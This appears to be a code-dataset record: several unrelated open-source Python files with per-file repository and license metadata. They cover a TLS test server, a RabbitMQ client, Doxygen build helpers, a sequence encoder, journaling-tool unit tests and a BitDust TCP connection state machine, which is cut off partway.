#intersphinx_mapping = {'http://docs.python.org/': None}
|
apache-2.0
| 5,722,083,156,617,589,000 | 31.8 | 79 | 0.689837 | false |
tasleson/lsm-ci
|
testing/server.py
|
1
|
1369
|
#!/usr/bin/env python3
"""
Test development server.
"""
import socket
import ssl
import testlib
import traceback
import sys
bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(("", 8675))
bindsocket.listen(5)
while True:
print("Waiting for a client...")
new_socket, from_addr = bindsocket.accept()
print("Accepted a connection from %s" % str(from_addr))
connection = ssl.wrap_socket(
new_socket,
server_side=True,
certfile="server_cert.pem",
keyfile="server_key.pem",
ca_certs="client_cert.pem",
cert_reqs=ssl.CERT_REQUIRED,
)
in_line = "start"
t = testlib.Transport(connection)
try:
while in_line:
in_line = input("control> ")
if in_line:
args = in_line.split()
if len(args) > 1:
t.write_msg(testlib.Request(args[0], args[1:]))
else:
t.write_msg(testlib.Request(args[0]))
resp = t.read_msg()
print(resp)
except KeyboardInterrupt:
bindsocket.shutdown(socket.SHUT_RDWR)
bindsocket.close()
sys.exit(1)
except EOFError:
pass
except Exception:
traceback.print_exc(file=sys.stdout)
finally:
connection.close()
|
apache-2.0
| -4,696,118,900,612,178,000 | 22.603448 | 67 | 0.577064 | false |
telefonicaid/murano
|
murano/common/messaging/mqclient.py
|
1
|
3376
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import ssl as ssl_module
from eventlet import patcher
kombu = patcher.import_patched('kombu')
from oslo.serialization import jsonutils
from subscription import Subscription
log = logging.getLogger("murano-common.messaging")
class MqClient(object):
def __init__(self, login, password, host, port, virtual_host,
ssl=False, ca_certs=None):
ssl_params = None
if ssl is True:
ssl_params = {
'ca_certs': ca_certs,
'cert_reqs': ssl_module.CERT_REQUIRED
}
self._connection = kombu.Connection(
'amqp://{0}:{1}@{2}:{3}/{4}'.format(
login,
password,
host,
port,
virtual_host
), ssl=ssl_params
)
self._channel = None
self._connected = False
def __enter__(self):
self.connect()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def connect(self):
self._connection.connect()
self._channel = self._connection.channel()
self._connected = True
def close(self):
self._connection.close()
self._connected = False
def declare(self, queue, exchange='', enable_ha=False, ttl=0):
if not self._connected:
raise RuntimeError('Not connected to RabbitMQ')
queue_arguments = {}
if enable_ha is True:
# To use mirrored queues feature in RabbitMQ 2.x
# we need to declare this policy on the queue itself.
#
# Warning: this option has no effect on RabbitMQ 3.X,
# to enable mirrored queues feature in RabbitMQ 3.X, please
# configure RabbitMQ.
queue_arguments['x-ha-policy'] = 'all'
if ttl > 0:
queue_arguments['x-expires'] = ttl
exchange = kombu.Exchange(exchange, type='direct', durable=True)
queue = kombu.Queue(queue, exchange, queue, durable=True,
queue_arguments=queue_arguments)
bound_queue = queue(self._connection)
bound_queue.declare()
def send(self, message, key, exchange=''):
if not self._connected:
raise RuntimeError('Not connected to RabbitMQ')
producer = kombu.Producer(self._connection)
producer.publish(
exchange=str(exchange),
routing_key=str(key),
body=jsonutils.dumps(message.body),
message_id=str(message.id)
)
def open(self, queue, prefetch_count=1):
if not self._connected:
raise RuntimeError('Not connected to RabbitMQ')
return Subscription(self._connection, queue, prefetch_count)
|
apache-2.0
| 6,651,683,647,796,950,000 | 30.849057 | 72 | 0.601007 | false |
ASoftTech/Scons-Tools-Grbd
|
scons_tools_grbd/Tools/Docs/Doxygen/DoxygenCommon.py
|
1
|
12301
|
"""
DoxygenCommon
Common code associated with doxygen builders
"""
import os, sys, os.path as path, yaml
import SCons.Script
from SCons.Environment import Environment
from SCons.Script import File, Dir
import glob
from fnmatch import fnmatch
from functools import reduce
# Currently supported output formats and their default
# values and output locations.
# From left to right:
# 1. default setting YES|NO
# 2. default output folder for this format
# 3. name of the (main) output file
# 4. default extension "
# 5. field for overriding the output file extension
output_formats = {
"HTML": ("YES", "html", "index", ".html", "HTML_FILE_EXTENSION"),
"LATEX": ("YES", "latex", "refman", ".tex", ""),
"RTF": ("NO", "rtf", "refman", ".rtf", ""),
"MAN": ("NO", "man", "", ".3", "MAN_EXTENSION"),
"XML": ("NO", "xml", "index", ".xml", ""),
}
def detect(env):
"""Detect if mkdocs exe is detected on the system, or use user specified option"""
if 'Mkdocs' in env:
return env.Detect(env['Doxygen'])
else:
return env.Detect('doxygen')
def setup_opts(env):
"""Common setup of options for Mkdocs builders"""
# Available Options - These override those within the yaml configuration file
env.SetDefault(
# Default exe to launch
Doxygen = 'doxygen',
# Working directory is current directory (default)
Doxygen_WorkingDir = env.Dir('.'),
# Additional Arguments
Doxygen_ExtraArgs = [],
)
# Scanner related - modification of sources
def DoxySourceScan(node, env, path):
"""
Doxygen Doxyfile source scanner. This should scan the Doxygen file and add
any files used to generate docs to the list of source files.
"""
filepaths = DoxySourceFiles(node, env)
sources = map(lambda path: env.File(path), filepaths)
return sources
def DoxySourceScanCheck(node, env):
"""Check if we should scan this file"""
return path.isfile(node.path)
# Emiiter related - modification of targets
def DoxyEmitter(target, source, env):
"""Doxygen Doxyfile emitter"""
# Choose Doxyfile as source file if not specified
if not source:
doxyfilenode = File('Doxyfile')
source.append(doxyfilenode)
else:
doxyfilenode = source[0]
doxy_fpath = str(doxyfilenode)
conf_dir = path.dirname(doxy_fpath)
data = DoxyfileParse(doxyfilenode.get_contents(), conf_dir)
targets = []
out_dir = data.get("OUTPUT_DIRECTORY", ".")
if not path.isabs(out_dir):
out_dir = path.join(conf_dir, out_dir)
# add our output locations
for (k, v) in output_formats.items():
if data.get("GENERATE_" + k, v[0]) == "YES":
# Initialize output file extension for MAN pages
if k == 'MAN':
# Is the given extension valid?
manext = v[3]
if v[4] and v[4] in data:
manext = data.get(v[4])
# Try to strip off dots
manext = manext.replace('.', '')
# Can we convert it to an int?
try:
e = int(manext)
except:
# No, so set back to default
manext = "3"
od = env.Dir(path.join(out_dir, data.get(k + "_OUTPUT", v[1]), "man" + manext))
else:
od = env.Dir(path.join(out_dir, data.get(k + "_OUTPUT", v[1])))
# don't clobber target folders
env.Precious(od)
# set up cleaning stuff
env.Clean(od, od)
# Add target files
if k != "MAN":
# Is an extension override var given?
if v[4] and v[4] in data:
fname = v[2] + data.get(v[4])
else:
fname = v[2] + v[3]
of = env.File(path.join(out_dir, data.get(k + "_OUTPUT", v[1]), fname))
targets.append(of)
# don't clean single files, we remove the complete output folders (see above)
env.NoClean(of)
else:
# Special case: MAN pages
# We have to add a target file docs/man/man3/foo.h.3
# for each input file foo.h, so we scan the config file
# a second time... :(
filepaths = DoxySourceFiles(doxyfilenode, env)
for f in filepaths:
if path.isfile(f) and f != doxy_fpath:
of = env.File(path.join(out_dir,
data.get(k + "_OUTPUT", v[1]),
"man" + manext,
f + "." + manext))
targets.append(of)
# don't clean single files, we remove the complete output folders (see above)
env.NoClean(of)
# add the tag file if neccessary:
tagfile = data.get("GENERATE_TAGFILE", "")
if tagfile != "":
if not path.isabs(tagfile):
tagfile = path.join(conf_dir, tagfile)
targets.append(env.File(tagfile))
return (targets, source)
# Common between emmiter / scanners
def DoxySourceFiles(node, env):
"""
Scan the given node's contents (a Doxygen file) and add
any files used to generate docs to the list of source files.
"""
default_file_patterns = [
'*.c', '*.cc', '*.cxx', '*.cpp', '*.c++', '*.java', '*.ii', '*.ixx',
'*.ipp', '*.i++', '*.inl', '*.h', '*.hh ', '*.hxx', '*.hpp', '*.h++',
'*.idl', '*.odl', '*.cs', '*.php', '*.php3', '*.inc', '*.m', '*.mm',
'*.py',
]
default_exclude_patterns = [
'*~',
]
sources = []
# We're running in the top-level directory, but the doxygen
# configuration file is in the same directory as node; this means
# that relative pathnames in node must be adjusted before they can
# go onto the sources list
conf_dir = path.dirname(str(node))
data = DoxyfileParse(node.get_contents(), conf_dir)
if data.get("RECURSIVE", "NO") == "YES":
recursive = True
else:
recursive = False
file_patterns = data.get("FILE_PATTERNS", default_file_patterns)
exclude_patterns = data.get("EXCLUDE_PATTERNS", default_exclude_patterns)
input = data.get("INPUT")
if input:
for node in data.get("INPUT", []):
if not path.isabs(node):
node = path.join(conf_dir, node)
if path.isfile(node):
sources.append(node)
elif path.isdir(node):
if recursive:
for root, dirs, files in os.walk(node):
for f in files:
filename = path.join(root, f)
pattern_check = reduce(lambda x, y: x or bool(fnmatch(filename, y)), file_patterns, False)
exclude_check = reduce(lambda x, y: x and fnmatch(filename, y), exclude_patterns, True)
if pattern_check and not exclude_check:
sources.append(filename)
else:
for pattern in file_patterns:
sources.extend(glob.glob("/".join([node, pattern])))
else:
# No INPUT specified, so apply plain patterns only
if recursive:
for root, dirs, files in os.walk('.'):
for f in files:
filename = path.join(root, f)
pattern_check = reduce(lambda x, y: x or bool(fnmatch(filename, y)), file_patterns, False)
exclude_check = reduce(lambda x, y: x and fnmatch(filename, y), exclude_patterns, True)
if pattern_check and not exclude_check:
sources.append(filename)
else:
for pattern in file_patterns:
sources.extend(glob.glob(pattern))
# Add @INCLUDEd files to the list of source files:
for node in data.get("@INCLUDE", []):
sources.append(node)
# Add tagfiles to the list of source files:
for node in data.get("TAGFILES", []):
file = node.split("=")[0]
if not path.isabs(file):
file = path.join(conf_dir, file)
sources.append(file)
# Add additional files to the list of source files:
def append_additional_source(option, formats):
for f in formats:
if data.get('GENERATE_' + f, output_formats[f][0]) == "YES":
file = data.get(option, "")
if file != "":
if not path.isabs(file):
file = path.join(conf_dir, file)
if path.isfile(file):
sources.append(file)
break
append_additional_source("HTML_STYLESHEET", ['HTML'])
append_additional_source("HTML_HEADER", ['HTML'])
append_additional_source("HTML_FOOTER", ['HTML'])
return sources
def DoxyfileParse(file_contents, conf_dir, data=None):
"""
Parse a Doxygen source file and return a dictionary of all the values.
Values will be strings and lists of strings.
"""
file_contents = file_contents.decode('utf8', 'ignore')
if data is None:
data = {}
import shlex
lex = shlex.shlex(instream=file_contents, posix=True)
lex.wordchars += "*+./-:@"
lex.whitespace = lex.whitespace.replace("\n", "")
lex.escape = ""
lineno = lex.lineno
token = lex.get_token()
key = None
last_token = ""
key_token = True # The first token should be a key.
next_key = False
new_data = True
def append_data(data, key, new_data, token):
if new_data or len(data[key]) == 0:
data[key].append(token)
else:
data[key][-1] += token
while token:
if token in ['\n']:
if last_token not in ['\\']:
key_token = True
elif token in ['\\']:
pass
elif key_token:
key = token
key_token = False
else:
if token == "+=":
if key not in data:
data[key] = []
elif token == "=":
if key == "TAGFILES" and key in data:
append_data(data, key, False, "=")
new_data = False
elif key == "@INCLUDE" and key in data:
# don't reset the @INCLUDE list when we see a new @INCLUDE line.
pass
else:
data[key] = []
elif key == "@INCLUDE":
# special case for @INCLUDE key: read the referenced
# file as a doxyfile too.
nextfile = token
if not path.isabs(nextfile):
nextfile = path.join(conf_dir, nextfile)
if nextfile in data[key]:
raise Exception("recursive @INCLUDE in Doxygen config: " + nextfile)
data[key].append(nextfile)
fh = open(nextfile, 'r')
DoxyfileParse(fh.read(), conf_dir, data)
fh.close()
else:
append_data(data, key, new_data, token)
new_data = True
last_token = token
token = lex.get_token()
if last_token == '\\' and token != '\n':
new_data = False
append_data(data, key, new_data, '\\')
# compress lists of len 1 into single strings
for (k, v) in data.copy().items():
if len(v) == 0:
data.pop(k)
# items in the following list will be kept as lists and not converted to strings
if k in ["INPUT", "FILE_PATTERNS", "EXCLUDE_PATTERNS", "TAGFILES", "@INCLUDE"]:
continue
if len(v) == 1:
data[k] = v[0]
return data
|
mit
| -959,350,828,641,448,600 | 33.862974 | 118 | 0.509959 | false |
mpdehaan/camp
|
camp/tracker/scenes.py
|
1
|
1248
|
"""
Copyright 2016, Michael DeHaan <michael.dehaan@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from camp.tracker.scene import Scene
class Scenes(object):
__slots__ = [ '_scenes', '_factory' ]
def __init__(self, song, **scenes):
self._factory = song
self._scenes = dict()
for (scene_name, scene) in scenes.items():
if getattr(scene, '__call__', None) is not None:
scene = scene(song)
if not isinstance(scene, Scene):
raise Exception("only a Scene is allowed inside of Scenes set method, got %s" % scene)
self._scenes[scene_name] = scene
scene._factory = song
scene.build()
def as_dict(self):
return self._scenes
|
apache-2.0
| -4,207,163,904,414,912,000 | 30.2 | 102 | 0.659455 | false |
nearai/program_synthesis
|
program_synthesis/naps/examples/seq2seq/pointer_seq_encoder.py
|
1
|
1895
|
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch.autograd import Variable
class SeqEncoder(nn.Module):
def __init__(self, args):
super(SeqEncoder, self).__init__()
self.num_units = args.num_units
self.num_encoder_layers = args.num_encoder_layers
self.bidirectional = args.bidirectional
self._cuda = args.cuda
self.args = args
self.encoder = nn.GRU(
self.num_units, self.num_units, args.num_encoder_layers, batch_first=True,
dropout=args.encoder_dropout, bidirectional=self.bidirectional)
directions = 2 if self.bidirectional else 1
if directions * args.num_encoder_layers > 1:
self.encoder_proj = nn.Linear(directions * args.num_encoder_layers * self.num_units, self.num_units)
def forward(self, masked_padded_texts, text_lengths):
batch_size = masked_padded_texts.shape[0]
num_directions = 2 if self.bidirectional else 1
t_type = (torch.cuda.FloatTensor if self._cuda else torch.FloatTensor)
init = Variable(t_type(num_directions * self.num_encoder_layers, batch_size, self.num_units).fill_(0))
masked_packed_texts = pack_padded_sequence(masked_padded_texts, text_lengths, batch_first=True)
# memory: torch.nn.utils.rnn.PackedSequence
# [bsz x len x (dim * num_directions)]
memory, hidden = self.encoder(masked_packed_texts, init)
memory, _ = pad_packed_sequence(memory, batch_first=True)
if num_directions * self.num_encoder_layers > 1:
# Make batch-first
hidden = hidden.transpose(0, 1).contiguous()
# Project to num_units units
hidden = self.encoder_proj(hidden.view(hidden.shape[0], -1))
else:
hidden = hidden.squeeze(0)
return hidden, memory
|
apache-2.0
| 2,590,437,045,472,163,000 | 45.219512 | 112 | 0.65277 | false |
chrisatthestudy/jot
|
src/test.py
|
1
|
8053
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Python CLI Test Unit
"""
# Standard library imports
import datetime
import os
# Third party imports
# Application specific imports
import jot
if (__name__ == "__main__"):
# Basic unit tests for API()
import unittest
class APITestCase(unittest.TestCase):
def setUp(self):
self.api = jot.Jot()
def tearDown(self):
self.api = None
try:
os.remove("jot.txt")
except:
pass
def testBasic(self):
# Verify that the instance was created
self.assertNotEqual(self.api, None)
def testExecute(self):
# Verify that the main execution routine returns True
self.assertEqual(self.api.execute({"<date>": "2015-12-10", "<entry>": "Execute test"}), True)
def test_adjust_date(self):
# Verify that adjust_date() works in the simplest version
today = datetime.datetime.now()
self.assertEqual(self.api.adjust_date(today, ''), today)
def test_adjust_date_today(self):
# Verify that adjust_date() returns the correct value
# for 'today'
today = datetime.datetime.now()
self.assertEqual(self.api.adjust_date(today, 'today'), today)
def test_adjust_date_yesterday(self):
# Verify that adjust_date() returns the correct value
# for 'yesterday'
today = datetime.datetime.now()
yesterday = today - datetime.timedelta(1)
self.assertEqual(self.api.adjust_date(today, 'yesterday'), yesterday)
def test_adjust_date_this_week(self):
# Verify that adjust_date() returns the correct value
# for 'this-week'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
this_week = datetime.datetime.strptime("2015-07-20", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'this-week'), this_week)
def test_adjust_date_this_month(self):
# Verify that adjust_date() returns the correct value
# for 'this-month'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
this_month = datetime.datetime.strptime("2015-07-01", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'this-month'), this_month)
def test_adjust_date_this_year(self):
# Verify that adjust_date() returns the correct value
# for 'this-year'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
this_year = datetime.datetime.strptime("2015-01-01", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'this-year'), this_year)
def test_adjust_date_last_week(self):
# Verify that adjust_date() returns the correct value
# for 'last-week'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
last_week = datetime.datetime.strptime("2015-07-16", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-week'), last_week)
def test_adjust_date_last_month(self):
# Verify that adjust_date() returns the correct value
# for 'last-month'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
last_month = datetime.datetime.strptime("2015-06-23", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-month'), last_month)
def test_adjust_date_last_month_for_february(self):
# Verify that adjust_date() returns the correct value
# for 'last-month' when we are at the end of March and the day
# would not be valid for February
today = datetime.datetime.strptime("2015-03-30", "%Y-%m-%d")
last_month = datetime.datetime.strptime("2015-02-28", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-month'), last_month)
def test_adjust_date_last_month_across_year(self):
# Verify that adjust_date() returns the correct value
# for 'last-month' when last month is in the previous year
today = datetime.datetime.strptime("2015-01-18", "%Y-%m-%d")
last_month = datetime.datetime.strptime("2014-12-18", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-month'), last_month)
def test_adjust_date_day_nn(self):
# Verify that adjust_date() returns the correct value
# for 'day-nn'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
day_nn = datetime.datetime.strptime("2015-07-08", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'day-08'), day_nn)
def test_adjust_date_month_nn(self):
# Verify that adjust_date() returns the correct value
# for 'month-nn'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
month_nn = datetime.datetime.strptime("2015-03-23", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'month-03'), month_nn)
def test_adjust_date_year_nn(self):
# Verify that adjust_date() returns the correct value
# for 'year-nn'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
year_nn = datetime.datetime.strptime("2012-07-23", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'year-2012'), year_nn)
def test_adjust_date_days_ago(self):
# Verify that adjust_date() returns the correct value for
# 'nn-days-ago'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
daysago = datetime.datetime.strptime("2015-07-20", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, '3-days-ago'), daysago)
def test_adjust_date_days_ago_across_month(self):
# Verify that adjust_date() returns the correct value for
# 'nn-days-ago' when it crosses a month boundary
today = datetime.datetime.strptime("2015-07-03", "%Y-%m-%d")
daysago = datetime.datetime.strptime("2015-06-28", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, '5-days-ago'), daysago)
def test_date_stamp(self):
# Verify that date_stamp() returns the correct value in the
# simplest case.
self.assertEqual(self.api.date_stamp('2015-03-21'), '2015-03-21')
def test_date_stamp_today(self):
# Verify that date_stamp() returns the correct value for today's
# date.
self.assertEqual(self.api.date_stamp('today'), datetime.datetime.now().strftime('%Y-%m-%d'))
def test_invalid_date_stamp(self):
# Verify that date_stamp() reacts appropriately to an invalid
# date-string (it should return today's date).
self.assertEqual(self.api.date_stamp('wrong'), datetime.datetime.now().strftime('%Y-%m-%d'))
def test_portable_path(self):
# Verify that portable_path() returns the actual path to the
# Python script.
script_path = os.getcwd()
self.assertEqual(self.api.portable_path(), script_path)
def test_prepare_file(self):
# Verify that prepare_file() results in an empty contents list.
self.api.prepare_file()
self.assertEqual(self.api.contents, [])
def test_save_file(self):
# Verify that save_file() creates a file
self.api.add_line("2015-12-10", "This is a test")
self.api.save_file()
unittest.main()
|
mit
| 3,204,859,210,727,376,000 | 44.755682 | 105 | 0.56302 | false |
vesellov/bitdust.devel
|
transport/tcp/tcp_connection.py
|
1
|
16191
|
#!/usr/bin/env python
# tcp_connection.py
#
# Copyright (C) 2008-2018 Veselin Penev, https://bitdust.io
#
# This file (tcp_connection.py) is part of BitDust Software.
#
# BitDust is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BitDust Software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with BitDust Software. If not, see <http://www.gnu.org/licenses/>.
#
# Please contact us if you have any questions at bitdust.io@gmail.com
"""
.. module:: tcp_connection.
.. role:: red
BitDust tcp_connection() Automat
EVENTS:
* :red:`connection-lost`
* :red:`connection-made`
* :red:`data-received`
* :red:`disconnect`
* :red:`send-keep-alive`
* :red:`timer-10sec`
"""
#------------------------------------------------------------------------------
from __future__ import absolute_import
#------------------------------------------------------------------------------
_Debug = True
_DebugLevel = 8
#------------------------------------------------------------------------------
import os
import time
from twisted.protocols import basic
#------------------------------------------------------------------------------
from logs import lg
from automats import automat
from lib import strng
from lib import net_misc
#------------------------------------------------------------------------------
MAX_SIMULTANEOUS_CONNECTIONS = 250
CMD_HELLO = b'h'
CMD_WAZAP = b'w'
CMD_DATA = b'd'
CMD_OK = b'o'
CMD_ABORT = b'a'
CMD_LIST = [CMD_HELLO, CMD_WAZAP, CMD_DATA, CMD_OK, CMD_ABORT, ]
#------------------------------------------------------------------------------
class TCPConnection(automat.Automat, basic.Int32StringReceiver):
SoftwareVersion = b'1'
timers = {
'timer-10sec': (10.0, ['CLIENT?', 'SERVER?']),
}
def __init__(self):
self.stream = None
self.peer_address = None
self.peer_external_address = None
self.peer_idurl = None
self.total_bytes_received = 0
self.total_bytes_sent = 0
self.outboxQueue = []
self.last_wazap_received = 0
def connectionMade(self):
if _Debug:
lg.out(_DebugLevel, 'tcp_connection.connectionMade %s' % net_misc.pack_address(self.getTransportAddress()))
address = self.getAddress()
name = 'tcp_connection[%s]' % strng.to_text(net_misc.pack_address(address))
automat.Automat.__init__(
self, name, 'AT_STARTUP',
debug_level=_DebugLevel, log_events=_Debug, publish_events=False)
self.log_transitions = _Debug
self.automat('connection-made')
def connectionLost(self, reason):
if _Debug:
lg.out(_DebugLevel, 'tcp_connection.connectionLost with %s' % net_misc.pack_address(self.getTransportAddress()))
self.automat('connection-lost')
def init(self):
"""
Method to initialize additional variables and flags at creation of the
state machine.
"""
def A(self, event, arg):
#---AT_STARTUP---
if self.state == 'AT_STARTUP':
if event == 'connection-made' and not self.isOutgoing(arg):
self.state = 'SERVER?'
self.doInit(arg)
elif event == 'connection-made' and self.isOutgoing(arg):
self.state = 'CLIENT?'
self.doInit(arg)
self.doCloseOutgoing(arg)
self.doSendHello(arg)
#---CONNECTED---
elif self.state == 'CONNECTED':
if event == 'data-received':
self.doReceiveData(arg)
elif event == 'connection-lost':
self.state = 'CLOSED'
self.doStopInOutFiles(arg)
self.doCloseStream(arg)
self.doDestroyMe(arg)
elif event == 'disconnect':
self.state = 'DISCONNECT'
self.doStopInOutFiles(arg)
self.doCloseStream(arg)
self.doDisconnect(arg)
elif event == 'send-keep-alive':
self.doSendWazap(arg)
#---CLIENT?---
elif self.state == 'CLIENT?':
if event == 'connection-lost':
self.state = 'CLOSED'
self.doDestroyMe(arg)
elif event == 'data-received' and self.isWazap(arg) and self.isSomePendingFiles(arg):
self.state = 'CONNECTED'
self.doReadWazap(arg)
self.doOpenStream(arg)
self.doStartPendingFiles(arg)
elif event == 'timer-10sec' or event == 'disconnect' or ( event == 'data-received' and not ( self.isWazap(arg) and self.isSomePendingFiles(arg) ) ):
self.state = 'DISCONNECT'
self.doDisconnect(arg)
#---SERVER?---
elif self.state == 'SERVER?':
if event == 'connection-lost':
self.state = 'CLOSED'
self.doDestroyMe(arg)
elif event == 'data-received' and self.isHello(arg):
self.state = 'CONNECTED'
self.doReadHello(arg)
self.doSendWazap(arg)
self.doOpenStream(arg)
self.doStartPendingFiles(arg)
elif event == 'timer-10sec' or event == 'disconnect' or ( event == 'data-received' and not self.isHello(arg) ):
self.state = 'DISCONNECT'
self.doDisconnect(arg)
#---CLOSED---
elif self.state == 'CLOSED':
pass
#---DISCONNECT---
elif self.state == 'DISCONNECT':
if event == 'connection-lost':
self.state = 'CLOSED'
self.doDestroyMe(arg)
return None
def isHello(self, arg):
"""
Condition method.
"""
try:
command, payload = arg
peeraddress, peeridurl = payload.split(b' ')
peerip, peerport = peeraddress.split(b':')
peerport = int(peerport)
peeraddress = (peerip, peerport)
except:
return False
return command == CMD_HELLO
def isWazap(self, arg):
"""
Condition method.
"""
try:
command, payload = arg
except:
return False
return command == CMD_WAZAP
def isOutgoing(self, arg):
"""
Condition method.
"""
from transport.tcp import tcp_node
if self.getConnectionAddress() is not None:
if self.getConnectionAddress() in list(tcp_node.started_connections().keys()):
return True
return False
def isSomePendingFiles(self, arg):
"""
Condition method.
"""
return len(self.factory.pendingoutboxfiles) > 0
def doInit(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
self.peer_address = self.getTransportAddress()
self.peer_external_address = self.peer_address
self.connected = time.time()
if self.peer_address not in tcp_node.opened_connections():
tcp_node.opened_connections()[self.peer_address] = []
tcp_node.opened_connections()[self.peer_address].append(self)
tcp_node.increase_connections_counter()
def doCloseOutgoing(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
conn = tcp_node.started_connections().pop(self.getConnectionAddress())
conn.connector = None
# lg.out(18, 'tcp_connection.doCloseOutgoing %s closed, %d more started' % (
# str(self.peer_address), len(tcp_node.started_connections())))
def doReadHello(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
try:
command, payload = arg
peeraddress, peeridurl = payload.split(b' ')
peerip, peerport = peeraddress.split(b':')
peerport = int(peerport)
peeraddress = (peerip, peerport)
except:
return
# self.peer_external_address = (self.peer_external_address[0], peerport)
self.peer_external_address = peeraddress
self.peer_idurl = peeridurl
if self.peer_address != self.peer_external_address:
tcp_node.opened_connections()[self.peer_address].remove(self)
if len(tcp_node.opened_connections()[self.peer_address]) == 0:
tcp_node.opened_connections().pop(self.peer_address)
self.peer_address = self.peer_external_address
if self.peer_address not in tcp_node.opened_connections():
tcp_node.opened_connections()[self.peer_address] = []
tcp_node.opened_connections()[self.peer_address].append(self)
lg.out(6, '%s : external peer address changed to %s' % (
self, self.peer_address))
# lg.out(18, 'tcp_connection.doReadHello from %s' % (self.peer_idurl))
def doReadWazap(self, arg):
"""
Action method.
"""
try:
command, payload = arg
except:
return
self.peer_idurl = payload
# lg.out(18, 'tcp_connection.doReadWazap from %s' % (self.peer_idurl))
def doReceiveData(self, arg):
"""
Action method.
"""
try:
command, payload = arg
except:
return
if command == CMD_DATA:
self.stream.data_received(payload)
elif command == CMD_OK:
self.stream.ok_received(payload)
elif command == CMD_ABORT:
self.stream.abort_received(payload)
elif command == CMD_WAZAP:
self.last_wazap_received = time.time()
else:
pass
def doSendHello(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
host = strng.to_bin(tcp_node.my_host() or '127.0.0.1:7771')
idurl = strng.to_bin(tcp_node.my_idurl() or 'None')
payload = host + b' ' + idurl
self.sendData(CMD_HELLO, payload)
def doSendWazap(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
payload = strng.to_bin(tcp_node.my_idurl() or 'None')
self.sendData(CMD_WAZAP, payload)
def doStartPendingFiles(self, arg):
"""
Action method.
"""
for filename, description, result_defer, keep_alive in self.factory.pendingoutboxfiles:
self.append_outbox_file(filename, description, result_defer, keep_alive)
self.factory.pendingoutboxfiles = []
def doStopInOutFiles(self, arg):
"""
Action method.
"""
self.stream.abort_files('disconnecting')
def doOpenStream(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_stream
self.stream = tcp_stream.TCPFileStream(self)
def doCloseStream(self, arg):
"""
Action method.
"""
self.stream.close()
del self.stream
self.stream = None
def doDisconnect(self, arg):
"""
Action method.
"""
if _Debug:
lg.out(_DebugLevel, 'tcp_connection.doDisconnect with %s' % str(self.peer_address))
try:
self.transport.stopListening()
except:
try:
self.transport.loseConnection()
except:
lg.exc()
def doDestroyMe(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
# lg.out(18, 'tcp_connection.doDestroyMe %s' % str(self))
self.destroy()
if self.peer_address in tcp_node.opened_connections():
tcp_node.opened_connections()[self.peer_address].remove(self)
if len(tcp_node.opened_connections()[self.peer_address]) == 0:
tcp_node.opened_connections().pop(self.peer_address)
tcp_node.decrease_connections_counter()
else:
raise Exception('not found %s in the opened connections' % self.peer_address)
self.stream = None
self.peer_address = None
self.peer_external_address = None
self.peer_idurl = None
self.outboxQueue = []
def getTransportAddress(self):
peer = self.transport.getPeer()
return net_misc.normalize_address((peer.host, int(peer.port), ))
def getConnectionAddress(self):
return net_misc.normalize_address(self.factory.connection_address)
def getAddress(self):
addr = self.getConnectionAddress()
if not addr:
addr = self.getTransportAddress()
return net_misc.normalize_address(addr)
def sendData(self, command, payload):
try:
data = self.SoftwareVersion + strng.to_bin(command.lower()[0:1]) + strng.to_bin(payload)
self.sendString(data)
except:
lg.exc()
return False
self.automat('data-sent', data)
return True
def stringReceived(self, data):
try:
version = data[0:1]
command = data[1:2]
payload = data[2:]
